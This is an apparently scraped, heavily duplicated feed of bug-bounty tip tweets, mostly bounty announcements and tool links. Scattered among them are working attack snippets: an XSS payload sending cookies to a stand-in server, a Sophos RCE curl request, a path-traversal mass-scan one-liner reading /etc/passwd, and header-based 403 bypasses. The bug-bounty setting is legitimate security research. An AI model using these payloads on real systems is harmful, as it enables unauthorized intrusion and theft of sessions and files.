#BugBountyTips of the Day
I have received so many texts related to bug-bounty. newcomer struggling to get their first bug. so they asked me if there any secret tips! sharing my personal tips plan and make a routine to spend 18 hours every day for at least 6 months. sacrifice is the key! #bugbountytips
---
A MindMap on Common Vulnerabilities in Smart contracts🚀 xMind: https://t.co/OAsnRDG9tp #web3 #SOLIDITY #infosec #bugbounty #bugbountytips #hacking #Security https://t.co/o6QN415tBJ
---
403bypasser 🔥🔥 Path traversals and header manipulation to bypass the 403 pages. https://t.co/BhuZytmAl4 #bugbounty #bugbountytip #bugbountytips
---
Bug Bounty Tip You can test server for DDOS by uploading image with extremely big pixel size (64250x64250px) Ref: hackerone/reports/390 #bugbountytips
---
📚 Collection of methods for getting RCE in various applications. GitHub Link :- https://t.co/3g0RuDJUUB #bugbounty #RCE #web #cybersecurity #bugbountytips #bugbountytip
I have received so many texts related to bug-bounty. newcomer struggling to get their first bug. so they asked me if there any secret tips! sharing my personal tips plan and make a routine to spend 18 hours every day for at least 6 months. sacrifice is the key! #bugbountytips
---
A MindMap on Common Vulnerabilities in Smart contracts🚀 xMind: https://t.co/OAsnRDG9tp #web3 #SOLIDITY #infosec #bugbounty #bugbountytips #hacking #Security https://t.co/o6QN415tBJ
---
403bypasser 🔥🔥 Path traversals and header manipulation to bypass the 403 pages. https://t.co/BhuZytmAl4 #bugbounty #bugbountytip #bugbountytips
---
Bug Bounty Tip You can test server for DDOS by uploading image with extremely big pixel size (64250x64250px) Ref: hackerone/reports/390 #bugbountytips
---
📚 Collection of methods for getting RCE in various applications. GitHub Link :- https://t.co/3g0RuDJUUB #bugbounty #RCE #web #cybersecurity #bugbountytips #bugbountytip
Xmind
Common Vulnerabilities in Smart contracts
A Mind Map about Common Vulnerabilities in Smart contracts submitted byAnugrah SR on May 30, 2022. Created with Xmind.
#BugBountyTips of the Day
(AutoPWN Suite - Automatically Scan For Vulnerabilities & Exploit Systems) - https://t.co/mj9zoQghRw #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/bP7OEUZAvg
---
📂 Arbitrary File Upload Tricks In Java based applications, especially useful in evading WAF detections https://t.co/mBOBgJH6lu #infosec #cybersecurity #bugbounty #Pentesting #redteam https://t.co/QmRbCHtJRb
---
In May, I submitted 56 vulnerabilities to 29 programs on @Hacker0x01 and 39 vulnerabilities to 3 programs on @Bugcrowd. It was quite a productive month after all, had some nice collaborations, found several 0days, and helped a lot of companies. #BugBounty
---
I earned $2,000 for my submission on @bugcrowd #ItTakesACrowd It was SQLi. Tip: every time sleep or wait cmd don't work. website also using PostgreSQL DB so use pg_sleep() cmd to confirm SQLi #bugbounty #bugbountytips
(AutoPWN Suite - Automatically Scan For Vulnerabilities & Exploit Systems) - https://t.co/mj9zoQghRw #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/bP7OEUZAvg
---
📂 Arbitrary File Upload Tricks In Java based applications, especially useful in evading WAF detections https://t.co/mBOBgJH6lu #infosec #cybersecurity #bugbounty #Pentesting #redteam https://t.co/QmRbCHtJRb
---
In May, I submitted 56 vulnerabilities to 29 programs on @Hacker0x01 and 39 vulnerabilities to 3 programs on @Bugcrowd. It was quite a productive month after all, had some nice collaborations, found several 0days, and helped a lot of companies. #BugBounty
---
I earned $2,000 for my submission on @bugcrowd #ItTakesACrowd It was SQLi. Tip: every time sleep or wait cmd don't work. website also using PostgreSQL DB so use pg_sleep() cmd to confirm SQLi #bugbounty #bugbountytips
SkyNet Tools
AutoPWN Suite - Automatically Scan For Vulnerabilities & Exploit Systems
How does it work? AutoPWN Suite uses nmap TCP-SYN scan to enumerate the host and detect the version of software running on it. After gathering enough informa
#BugBountyTips of the Day
Yay, I was awarded a $6,000 bounty on @Hacker0x01! https://t.co/LQQLiHA5cf #TogetherWeHitHarder #bugbounty https://t.co/uKvOI4IWx8
---
(BlackBird - OSINT Tool To Search Fast For Accounts By Username Across 85 Sites) - https://t.co/7Piac4RZVz #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/YJqvoyKcew
---
Nmap Cheat Sheat #infosec #hacking #cybersecurity #bugbounty #Ethicalhacking https://t.co/ZLQbqwBPFi
---
Anatomy of Ransomware attack ⚔ #infosec #CyberSecurity #bugbounty #cyberattacks #Ransomware #hacking #AWS #malware #cybersecuritytips #cybersec #Hackingtime #Pentesting #attacker #cloudsecurity https://t.co/tRu3tFTkhG
---
Want to find Subdomain Takeover vulnerabilities at scale? Try this 👇 #recontips #bugbountytips #attacksurface #recon #takeover #reconatscale #reconone https://t.co/wYlR8Ie5IO
Yay, I was awarded a $6,000 bounty on @Hacker0x01! https://t.co/LQQLiHA5cf #TogetherWeHitHarder #bugbounty https://t.co/uKvOI4IWx8
---
(BlackBird - OSINT Tool To Search Fast For Accounts By Username Across 85 Sites) - https://t.co/7Piac4RZVz #infosec #netsec #pentest #cybersecurity #bugbounty https://t.co/YJqvoyKcew
---
Nmap Cheat Sheat #infosec #hacking #cybersecurity #bugbounty #Ethicalhacking https://t.co/ZLQbqwBPFi
---
Anatomy of Ransomware attack ⚔ #infosec #CyberSecurity #bugbounty #cyberattacks #Ransomware #hacking #AWS #malware #cybersecuritytips #cybersec #Hackingtime #Pentesting #attacker #cloudsecurity https://t.co/tRu3tFTkhG
---
Want to find Subdomain Takeover vulnerabilities at scale? Try this 👇 #recontips #bugbountytips #attacksurface #recon #takeover #reconatscale #reconone https://t.co/wYlR8Ie5IO
HackerOne
HackerOne profile - harry_mg
HELLO - https://harry.mg
#BugBountyTips of the Day
Scanning for Confluence - Remote Code Execution via OGNL template injection (CVE-2022-26134) using nuclei templates Nuclei Template: https://t.co/up3HhwQSfO Confluence Advisory: https://t.co/wIi0iPAish #hackwithautomation #security #bugbounty #appsec https://t.co/JzkV3JvS1i
---
I reached a solid milestone when it comes to bug bounties... In the last 30 days only I earned more than 100k$ in bounties. Never thought this will happen... hard work pays out! Thanks to PayPal, #Apple and my favourite private program on BC. #bugbounty
---
Broken Access Control: #bugbounty and web #pentesting pro tips 💪 When hunting broken access control issues, try this: 1. First use EVERY exposed GUI function available 2. Look for API docs and extract URLs 3. Look for URLs in code 4. Look for URLs in search engines
---
The more I hack, the more I realise how important Coding/Dev knowledge is for the same and how much I suck at it🥲 #bugbountytips
---
CVE-2022-1040 RCE in Sophos firewall curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST ' https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"ᾳ<ffff>":"test" \}' Nuclei template: https://t.co/yn72HTKvmM #bugbounty #infosec #bugbountytip
---
Bug Bounty Tips Explanation : What tool you can use for for whatever bug is it Credit: Patrik Tags: #cybersecurity #bugbounty #bugbountytips #hacking #security #offsec https://t.co/ZBkZ5Gmn8j
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/bfzXOAm55r
Scanning for Confluence - Remote Code Execution via OGNL template injection (CVE-2022-26134) using nuclei templates Nuclei Template: https://t.co/up3HhwQSfO Confluence Advisory: https://t.co/wIi0iPAish #hackwithautomation #security #bugbounty #appsec https://t.co/JzkV3JvS1i
---
I reached a solid milestone when it comes to bug bounties... In the last 30 days only I earned more than 100k$ in bounties. Never thought this will happen... hard work pays out! Thanks to PayPal, #Apple and my favourite private program on BC. #bugbounty
---
Broken Access Control: #bugbounty and web #pentesting pro tips 💪 When hunting broken access control issues, try this: 1. First use EVERY exposed GUI function available 2. Look for API docs and extract URLs 3. Look for URLs in code 4. Look for URLs in search engines
---
The more I hack, the more I realise how important Coding/Dev knowledge is for the same and how much I suck at it🥲 #bugbountytips
---
CVE-2022-1040 RCE in Sophos firewall curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST ' https://$host/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"ᾳ<ffff>":"test" \}' Nuclei template: https://t.co/yn72HTKvmM #bugbounty #infosec #bugbountytip
---
Bug Bounty Tips Explanation : What tool you can use for for whatever bug is it Credit: Patrik Tags: #cybersecurity #bugbounty #bugbountytips #hacking #security #offsec https://t.co/ZBkZ5Gmn8j
---
Basic Linux Commands Credit: @securitygull #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/bfzXOAm55r
GitHub
Added CVE-2022-26134 (Confluence - Remote Code Execution) by ehsandeep · Pull Request #4527 · projectdiscovery/nuclei-templates
Template / PR Information
Reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-11303...
Reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-11303...
#BugBountyTips of the Day
You should go through all of them once at least :) #bugbounty https://t.co/6D9ZsrbDGT
---
API testing is fun! Breaking the stuffs by reading docs which were meant to be provided in order to actually build something. More like, getting the blueprints of a ship and using it to find the weaknesses in the ship instead of building it. #hacking #bugbounty
---
#bugbountytips #OSINT 🌟 Find company's owned domains (company.*) with these #googledorks: inurl:" https://deliveroo" intitle:deliveroo inurl:" https://www.deliveroo" intitle:deliveroo Add findings, then append -site:TLD to the dork to find more, until you got them all! #Hacking https://t.co/QYpYw5fqfc
---
Github Dorks are still one of my favorite techniques to use while Bug Bounty Hunting. Iv personally found email creds, FTP creds, AWS keys, and much more. Requires zero technical skill just persistence and luck. https://t.co/tkhBJ72s7W #bugbountytips #BugBounty #Pentesting
---
CRLFsuite - Fast CRLF Injection Scanning Tool https://t.co/BlyIZimwHu #cybersecurity #bugbountytips #hacking #tools https://t.co/zuYcqrWh4y
---
If checking for exposed source code is not in your methodology, then you may be missing out! 👁️🗨️ Let this hint by @daffainfo help you out in that case, because exposed source code is a gold mine! #bugbounty #bugbountytips 👇 https://t.co/NwdAwmGEgL
---
500-day streak yaaaay @RealTryHackMe #CyberSecurity #informationsecurity #BugBounty https://t.co/K2Far8OR4J
---
Best of Nmap Cheat Sheet #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/wXYoBe497L
---
Zed Attack Proxy Scripts for finding CVEs and Secrets. #cybersecurity @pdiscoveryio #bugbountytips https://t.co/jcLURm8MVC
---
CVE-2022-26134: Atlassian Confluence RCE PoC #BugBounty https://t.co/7UFw7TkwME
---
New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover. As if you use document.location=URI (Blocked) but using location=`URI` (Bypassed) </body><body onControl anything hello onmouseenter=(location=`//yourserver.com?c=`%2bcookie) 1> #bugbountytips
---
First bounty!🎉 Thanks @zseano and @BugBountyHunt3r team #hackerone #BugBounty https://t.co/NpWZBpEHWL
You should go through all of them once at least :) #bugbounty https://t.co/6D9ZsrbDGT
---
API testing is fun! Breaking the stuffs by reading docs which were meant to be provided in order to actually build something. More like, getting the blueprints of a ship and using it to find the weaknesses in the ship instead of building it. #hacking #bugbounty
---
#bugbountytips #OSINT 🌟 Find company's owned domains (company.*) with these #googledorks: inurl:" https://deliveroo" intitle:deliveroo inurl:" https://www.deliveroo" intitle:deliveroo Add findings, then append -site:TLD to the dork to find more, until you got them all! #Hacking https://t.co/QYpYw5fqfc
---
Github Dorks are still one of my favorite techniques to use while Bug Bounty Hunting. Iv personally found email creds, FTP creds, AWS keys, and much more. Requires zero technical skill just persistence and luck. https://t.co/tkhBJ72s7W #bugbountytips #BugBounty #Pentesting
---
CRLFsuite - Fast CRLF Injection Scanning Tool https://t.co/BlyIZimwHu #cybersecurity #bugbountytips #hacking #tools https://t.co/zuYcqrWh4y
---
If checking for exposed source code is not in your methodology, then you may be missing out! 👁️🗨️ Let this hint by @daffainfo help you out in that case, because exposed source code is a gold mine! #bugbounty #bugbountytips 👇 https://t.co/NwdAwmGEgL
---
500-day streak yaaaay @RealTryHackMe #CyberSecurity #informationsecurity #BugBounty https://t.co/K2Far8OR4J
---
Best of Nmap Cheat Sheet #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity #cybersecurityawareness https://t.co/wXYoBe497L
---
Zed Attack Proxy Scripts for finding CVEs and Secrets. #cybersecurity @pdiscoveryio #bugbountytips https://t.co/jcLURm8MVC
---
CVE-2022-26134: Atlassian Confluence RCE PoC #BugBounty https://t.co/7UFw7TkwME
---
New Cloudflare WAF Bypass to Fetch Cookie and Escalating XSS to Account Takeover. As if you use document.location=URI (Blocked) but using location=`URI` (Bypassed) </body><body onControl anything hello onmouseenter=(location=`//yourserver.com?c=`%2bcookie) 1> #bugbountytips
---
First bounty!🎉 Thanks @zseano and @BugBountyHunt3r team #hackerone #BugBounty https://t.co/NpWZBpEHWL
Twitter
Arth Bajpai 🇮🇳
You should go through all of them once at least :) #bugbounty
#BugBountyTips of the Day
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty #TogetherWeHitHarder https://t.co/BNIXCsVpIt
---
Pro tip for #bugbounty: Go over all URLs to test at least three times, preferably on separate days. On the first pass, I find the most stuff. On the 2nd pass, I find most issues I missed. On the 3rd pass, I barely find anything at all but still have usually missed a few. 😜🥳
---
CVE-2022-32275 😶 #BugBounty https://t.co/h9MO9vKLro
---
For Beginners https://t.co/kUzws8Mxz1 #bugbountytips #infosec #cybersecurity
---
Today somehow popped a shell on the main application a major cryptocurrency exchange. The impact is as devastating as the Web3 bugs you could have seen recently on other programs. The report was sent to their security team. Web2 bugs are alive. #bugbounty https://t.co/DrN23ItZxT
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty #TogetherWeHitHarder https://t.co/BNIXCsVpIt
---
Pro tip for #bugbounty: Go over all URLs to test at least three times, preferably on separate days. On the first pass, I find the most stuff. On the 2nd pass, I find most issues I missed. On the 3rd pass, I barely find anything at all but still have usually missed a few. 😜🥳
---
CVE-2022-32275 😶 #BugBounty https://t.co/h9MO9vKLro
---
For Beginners https://t.co/kUzws8Mxz1 #bugbountytips #infosec #cybersecurity
---
Today somehow popped a shell on the main application a major cryptocurrency exchange. The impact is as devastating as the Web3 bugs you could have seen recently on other programs. The report was sent to their security team. Web2 bugs are alive. #bugbounty https://t.co/DrN23ItZxT
Twitter
XC0D3R(Joy ahmed)🇧🇩
Yay, I was awarded 200$ bounty on @Bugcrowd This one is my first bounty ever. It will motivate me a lot for my future journey.And specially thanks to @EmptyMahbob for always your support and @GodfatherOrwa for always sharing some unique tips. #bugbounty …
#BugBountyTips of the Day
CRLF Suite - Automated Injection Toolkit (very fast) - Repo: https://t.co/vgRW4llTwz - Creator: Nefcore Security - #CyberSecurity #bugbountytips #CTF #infosec https://t.co/mqNC5dWvp8
---
Subdomain Enumeration Automation Script ⚙️ #bugbountytips https://t.co/4qEU0OyvGY
---
New Write-up on InfoSec Write-ups publication : "Detecting DNS Tunneling using Spark Structured Streaming" #bugbounty #bugbountywriteup #bugbountytips https://t.co/rJoYv2EBba
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01 for Exposed Secrets! https://t.co/JJsoq3ZO3t #bugbountytips #BugBounty #TogetherWeHitHarder https://t.co/7cT0ddkWSv
---
A little ahead of schedule, the new video on my 2-week experience (#bugbounty hunting part-time) with the Pinterest program is live. Hopefully there are some pearls of information that help others out. This was almost entirely manual testing! https://t.co/BJTZJCY7hp
---
Improve your bug hunting 1. Go to @intigriti bug-byte 2. Every bug-byte blog post contains tools section 3. There are bug-byte blogs. 4. Spend time and learn about tools #bugbountytips #bugbounty @ADITYASHENDE17
---
Aki's beta version is live now🔥 Let your web3 voices be heared! Leave your comments below 👇👇 and win the 💰💰💰 #bugbountytips #BugBounty #Pentesting https://t.co/C8M6hamfCX
---
I earned $3,600 for my submission on @bugcrowd https://t.co/adNqMtZ00S #ItTakesACrowd It was a DOM based XSS escalated to a one-click Account Takeover, at one of the oldest public program of Bugcrowd. #cybersecurity #bugbounty #infosec #hacking #informationsecurity #hackerone https://t.co/d1Rzqadesg
---
Python Debugging Cheat Sheet #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Cloud #OpenSource #AI #5G #DEVCommunity #codinglife #Automation #FutureOfWork #RPA @SourabhSKatoch https://t.co/tzeEtf8ZOq
---
API Bug-Bounty Tools Check list (Part - 1) -> Postman (It is like Burpsuite for API) -> APISec -> AppKnox -> Synopsis API Scanner -> Data Theorem API Secure #cybersecuritytips #bugbountytips #bugbounty #TweetOfTheDay #CyberSecurity #100daysofbugbounty #offensivesecurity #Defcon
CRLF Suite - Automated Injection Toolkit (very fast) - Repo: https://t.co/vgRW4llTwz - Creator: Nefcore Security - #CyberSecurity #bugbountytips #CTF #infosec https://t.co/mqNC5dWvp8
---
Subdomain Enumeration Automation Script ⚙️ #bugbountytips https://t.co/4qEU0OyvGY
---
New Write-up on InfoSec Write-ups publication : "Detecting DNS Tunneling using Spark Structured Streaming" #bugbounty #bugbountywriteup #bugbountytips https://t.co/rJoYv2EBba
---
Yay, I was awarded a $1,000 bounty on @Hacker0x01 for Exposed Secrets! https://t.co/JJsoq3ZO3t #bugbountytips #BugBounty #TogetherWeHitHarder https://t.co/7cT0ddkWSv
---
A little ahead of schedule, the new video on my 2-week experience (#bugbounty hunting part-time) with the Pinterest program is live. Hopefully there are some pearls of information that help others out. This was almost entirely manual testing! https://t.co/BJTZJCY7hp
---
Improve your bug hunting 1. Go to @intigriti bug-byte 2. Every bug-byte blog post contains tools section 3. There are bug-byte blogs. 4. Spend time and learn about tools #bugbountytips #bugbounty @ADITYASHENDE17
---
Aki's beta version is live now🔥 Let your web3 voices be heared! Leave your comments below 👇👇 and win the 💰💰💰 #bugbountytips #BugBounty #Pentesting https://t.co/C8M6hamfCX
---
I earned $3,600 for my submission on @bugcrowd https://t.co/adNqMtZ00S #ItTakesACrowd It was a DOM based XSS escalated to a one-click Account Takeover, at one of the oldest public program of Bugcrowd. #cybersecurity #bugbounty #infosec #hacking #informationsecurity #hackerone https://t.co/d1Rzqadesg
---
Python Debugging Cheat Sheet #MachineLearning #python #IoT #100DaysOfCode #programming #CodeNewbie #reactjs #bugbounty #DataScience #gamedev #BigData #Analytics #NeuralNetworks #Cloud #OpenSource #AI #5G #DEVCommunity #codinglife #Automation #FutureOfWork #RPA @SourabhSKatoch https://t.co/tzeEtf8ZOq
---
API Bug-Bounty Tools Check list (Part - 1) -> Postman (It is like Burpsuite for API) -> APISec -> AppKnox -> Synopsis API Scanner -> Data Theorem API Secure #cybersecuritytips #bugbountytips #bugbounty #TweetOfTheDay #CyberSecurity #100daysofbugbounty #offensivesecurity #Defcon
GitHub
GitHub - Nefcore/CRLFsuite: The most powerful CRLF injection (HTTP Response Splitting) scanner.
The most powerful CRLF injection (HTTP Response Splitting) scanner. - GitHub - Nefcore/CRLFsuite: The most powerful CRLF injection (HTTP Response Splitting) scanner.
#BugBountyTips of the Day
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/Ut6PGmFTky
---
New web #pentesting video is live on the methodology of testing File Upload dialogues which can lead to stored HTML injection, XSS, XXE, SSRF, and RCE. The goal is to bypass or trick the content "restrictions". #bugbountytips #infosec #bugbounty https://t.co/vSZ1Beg4JV
---
Always wanted this "Hacking Hackers" badge. Finally got it !! @Hacker0x01 Now Next goal is to participate in Live Hacking Events, hopefully I get a chance this year :) #TogetherWeHitHarder #bugbounty #cybersecurity https://t.co/aaY5IdLyhW
---
Yay, I was awarded $200 bounty on @Hacker0x01 @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/l9zE6zwKr2
---
CVE-2022-1388: F5 BIG-IP 🔥 #infosec #bugbounty https://t.co/UbXXvL9j9L
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/Ut6PGmFTky
---
New web #pentesting video is live on the methodology of testing File Upload dialogues which can lead to stored HTML injection, XSS, XXE, SSRF, and RCE. The goal is to bypass or trick the content "restrictions". #bugbountytips #infosec #bugbounty https://t.co/vSZ1Beg4JV
---
Always wanted this "Hacking Hackers" badge. Finally got it !! @Hacker0x01 Now Next goal is to participate in Live Hacking Events, hopefully I get a chance this year :) #TogetherWeHitHarder #bugbounty #cybersecurity https://t.co/aaY5IdLyhW
---
Yay, I was awarded $200 bounty on @Hacker0x01 @ADITYASHENDE17 #bugbounty #togetherwehitharder https://t.co/l9zE6zwKr2
---
CVE-2022-1388: F5 BIG-IP 🔥 #infosec #bugbounty https://t.co/UbXXvL9j9L
Twitter
Ali Hassan Khan
A simple and an easy finding on @Hacker0x01 While fuzzing, server-status endpoint was forbidden (403) Just added this header in request : X-Forwarded-For: 127.0.0.1 and I was able to bypass the forbidden (403) url or page. @ADITYASHENDE17 #bugbounty #tog…
#BugBountyTips of the Day
Ever noticed WebSocket requests while intercepting traffic in Burp Suite🤔 This thread🧵is for you don't know what it is and how it works! We're going to cover a short brief on Websockets in this thread🚀 (1/n) #bugbounties #bugbountytips #wapt #websockets
---
[BugBounty] Tips to Find Stored XSS - @bigb0ss___ https://t.co/5RMrt2ev1g #InfoSec #CyberSecurity #Security #BugBounty #XSS
---
Learn Account Takeover With CSRF - My First Bug on @BugBountyHunt3r with methodology by @zseano and @theXSSrat https://t.co/SqSu4ocvqr #myfirstbug #BugBounty #bugbountytips #hackers https://t.co/nKEOaCdNtm
---
> Quickly discover your target site's open ports with multiple search engines. uncover -q " https://t.co/PZPWw6V9QW" -e censys,fofa,shodan > Tool: https://t.co/QA0XoW2USI #bugbounty #bugbountytips #networkscan #penetrationtesting https://t.co/ILcewOSVM9
Ever noticed WebSocket requests while intercepting traffic in Burp Suite🤔 This thread🧵is for you don't know what it is and how it works! We're going to cover a short brief on Websockets in this thread🚀 (1/n) #bugbounties #bugbountytips #wapt #websockets
---
[BugBounty] Tips to Find Stored XSS - @bigb0ss___ https://t.co/5RMrt2ev1g #InfoSec #CyberSecurity #Security #BugBounty #XSS
---
Learn Account Takeover With CSRF - My First Bug on @BugBountyHunt3r with methodology by @zseano and @theXSSrat https://t.co/SqSu4ocvqr #myfirstbug #BugBounty #bugbountytips #hackers https://t.co/nKEOaCdNtm
---
> Quickly discover your target site's open ports with multiple search engines. uncover -q " https://t.co/PZPWw6V9QW" -e censys,fofa,shodan > Tool: https://t.co/QA0XoW2USI #bugbounty #bugbountytips #networkscan #penetrationtesting https://t.co/ILcewOSVM9
Medium
[BugBounty] Tips to Find Stored XSS
Intro
#BugBountyTips of the Day
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone https://t.co/n1HrXC5yRT
---
#bugbountytips #bugbounty I just published 0 Day Vulnerability — URI Normalization Issue — Access the Internal Tomcat Server #Apache https://t.co/p1fIxzDHFz https://t.co/NbN27UTfg6
---
Best ever Tools 🔧 for Bug Bounty Hunters... →Amass →Sublister →Gauplus →HTTPX →Gf tool →Kxss →Sqlmap →Commix →Tplmap →HYDRA →John the ripper →Burpsuite →Arjun →Paramspider →NoSQLmap →NMAP →Nikto →FFUF →403-Bypass →Gobuster #bugbounty #cybersecurity
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/hRLvLse6fY
---
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇 https://t.co/wbV6Sa1UEB
---
Linux Path Cheat Sheet :- #infosec #CyberSecurity #Hacking #cyber #infosecurity #Pentesting #nmap #cyberattack #Linux #AWS #opensource #security #MachineLearning #DataScience #DataAnalytics #bugbounty https://t.co/3Bdvgdzaex
---
Bug: Race condition attack [Medium] Tip: 1. Capture request on adding link/follow user's 2. Send to Turbo Intruder >> Attack with https://t.co/GHu42ZBab8 code 3. Numerous key links generated / Follower's no. increased #bugbounty #bugbountytips #hackerone https://t.co/dvfqAXv77z
---
Hello all! I released a new write up about bug bounty. Click below link to read it and enjoy! https://t.co/c5zyrkckua #bugbounty #bugbountytips @Hacker0x01 @Bugcrowd
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone https://t.co/n1HrXC5yRT
---
#bugbountytips #bugbounty I just published 0 Day Vulnerability — URI Normalization Issue — Access the Internal Tomcat Server #Apache https://t.co/p1fIxzDHFz https://t.co/NbN27UTfg6
---
Best ever Tools 🔧 for Bug Bounty Hunters... →Amass →Sublister →Gauplus →HTTPX →Gf tool →Kxss →Sqlmap →Commix →Tplmap →HYDRA →John the ripper →Burpsuite →Arjun →Paramspider →NoSQLmap →NMAP →Nikto →FFUF →403-Bypass →Gobuster #bugbounty #cybersecurity
---
Best of Nmap Cheat Sheet Credit: @mohamedmaly #infosec #cybersecurity #pentesting #oscp #informationsecurity #hacking #cissp #redteam #technology #DataSecurity #CyberSec #Hackers #tools #bugbountytips #Linux #websecurity #Network #NetworkSecurity https://t.co/hRLvLse6fY
---
Found a self-XSS? 🤨 Don't worry! Let's magically turn that into a valid XSS by sprinkling some CSRF on top of it! 🧙♂️ #bugbounty #bugbountytips 👇 https://t.co/wbV6Sa1UEB
---
Linux Path Cheat Sheet :- #infosec #CyberSecurity #Hacking #cyber #infosecurity #Pentesting #nmap #cyberattack #Linux #AWS #opensource #security #MachineLearning #DataScience #DataAnalytics #bugbounty https://t.co/3Bdvgdzaex
---
Bug: Race condition attack [Medium] Tip: 1. Capture request on adding link/follow user's 2. Send to Turbo Intruder >> Attack with https://t.co/GHu42ZBab8 code 3. Numerous key links generated / Follower's no. increased #bugbounty #bugbountytips #hackerone https://t.co/dvfqAXv77z
---
Hello all! I released a new write up about bug bounty. Click below link to read it and enjoy! https://t.co/c5zyrkckua #bugbounty #bugbountytips @Hacker0x01 @Bugcrowd
Twitter
ReconOne
Want to quickly find publicly exposed MySql backup files? Try this 👇 Credits: @_bughunter #recontips #AttackSurface #bugbountytips #mysql #reconone
#BugBountyTips of the Day
Admin Panel Finder - A burp suite extension that enumerates infrastructure and application admin interfaces https://t.co/ziAH4ydnbl #cybersecurity #bugbountytips #infosec https://t.co/3FaUWDomx9
---
reconFTW v2.3.1 is out with - Added ripgen @resync_gg @d0nutptr as option for permutations - Added dsieve @trick3st - Replaced nrich with smap @s0md3v - Get fresh resolvers before resolution - Added timeout option to gotator https://t.co/p3ENLkUAev #bugbounty #recon #hacking https://t.co/IcEQWnqW4H
---
Lets find some criticals at scale 🔥🔥🔥 cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent https://t.co/iVfwQiPFSy #bugbountytips #bugbountytip #bugbounty
---
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
---
Github dorks Bug hunting for beginners #Tips #bugbounty #github #Linux #programming https://t.co/JvsDHXOozT
---
#Giveaway I'm giving away either a @PentesterLab pro Voucher or @hackthebox_eu VIP+ Voucher (winner's choice). Like and retweet this for a chance to win. Follow for more giveaways this week. Feeling generous while the wife and I are recovering from surgeries #bugbounty #redteam
Admin Panel Finder - A burp suite extension that enumerates infrastructure and application admin interfaces https://t.co/ziAH4ydnbl #cybersecurity #bugbountytips #infosec https://t.co/3FaUWDomx9
---
reconFTW v2.3.1 is out with - Added ripgen @resync_gg @d0nutptr as option for permutations - Added dsieve @trick3st - Replaced nrich with smap @s0md3v - Get fresh resolvers before resolution - Added timeout option to gotator https://t.co/p3ENLkUAev #bugbounty #recon #hacking https://t.co/IcEQWnqW4H
---
Lets find some criticals at scale 🔥🔥🔥 cat hosts | httpx -nc -t 300 -p 80,443,8080,8443,8888,8088 -path "/jobmanager/logs/..%252f..%252f..%252f......%252f..%252fetc%252fpasswd" -mr "root:x" -silent https://t.co/iVfwQiPFSy #bugbountytips #bugbountytip #bugbounty
---
Bug Bounty Free Learning Materials Follow this thread if you can’t google and learn things😅 #bugbounty #bugbountytip #bugbountytips
---
Github dorks Bug hunting for beginners #Tips #bugbounty #github #Linux #programming https://t.co/JvsDHXOozT
---
#Giveaway I'm giving away either a @PentesterLab pro Voucher or @hackthebox_eu VIP+ Voucher (winner's choice). Like and retweet this for a chance to win. Follow for more giveaways this week. Feeling generous while the wife and I are recovering from surgeries #bugbounty #redteam
GitHub
GitHub - moeinfatehi/Admin-Panel_Finder: A burp suite extension that enumerates infrastructure and application admin interfaces…
